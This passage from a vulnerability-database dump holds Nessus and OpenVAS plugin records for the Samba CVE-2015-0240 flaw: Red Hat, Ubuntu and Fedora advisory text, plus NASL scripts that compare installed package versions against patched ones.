reference:\"samba3x-winbind-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-winbind-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"samba3x-winbind-devel-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-winbind-devel-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-winbind-devel-3.5.4-0.70.el5_6.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:58", "bulletinFamily": "scanner", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2015-0252.NASL", "href": "https://www.tenable.com/plugins/nessus/81471", "published": "2015-02-24T00:00:00", "title": "RHEL 7 : samba (RHSA-2015:0252)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0252. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81471);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"RHSA\", value:\"2015:0252\");\n\n script_name(english:\"RHEL 7 : samba (RHSA-2015:0252)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1346913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0240\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0252\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"libsmbclient-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libsmbclient-devel-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libwbclient-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"libwbclient-devel-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-client-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-client-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-common-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-common-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-dc-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-dc-libs-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"samba-debuginfo-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"samba-devel-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"samba-libs-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-pidl-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-pidl-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-python-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-python-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-test-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-test-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-test-devel-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-test-devel-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-winbind-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-winbind-clients-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.1.1-38.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"samba-winbind-modules-4.1.1-38.el7_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / libwbclient / libwbclient-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310842101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842101", "title": "Ubuntu Update for samba USN-2508-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for samba USN-2508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842101\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:43:53 +0100 (Wed, 25 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for samba USN-2508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Richard van Eeden discovered that the Samba\nsmbd file services incorrectly handled memory. A remote attacker could use this\nissue to possibly execute arbitrary code with root privileges.\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.1.11+dfsg-1ubuntu2.2\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.1.6+dfsg-1ubuntu2.14.04.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.6.3-2ubuntu2.12\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310871318", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871318", "title": "RedHat Update for samba3x RHSA-2015:0249-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2015:0249-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871318\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:42:23 +0100 (Wed, 25 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba3x RHSA-2015:0249-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the referenced Knowledgebase article.\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"samba3x on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0249-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-February/msg00029.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1346913\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.23~9.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-02-26T00:00:00", "id": "OPENVAS:1361412562310869042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869042", "title": "Fedora Update for samba FEDORA-2015-2538", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba FEDORA-2015-2538\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869042\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-26 05:39:39 +0100 (Thu, 26 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2015-2538\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-2538\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-February/150450.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.17~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310871316", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871316", "title": "RedHat Update for samba RHSA-2015:0251-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2015:0251-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871316\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:42:19 +0100 (Wed, 25 Feb 2015)\");\n 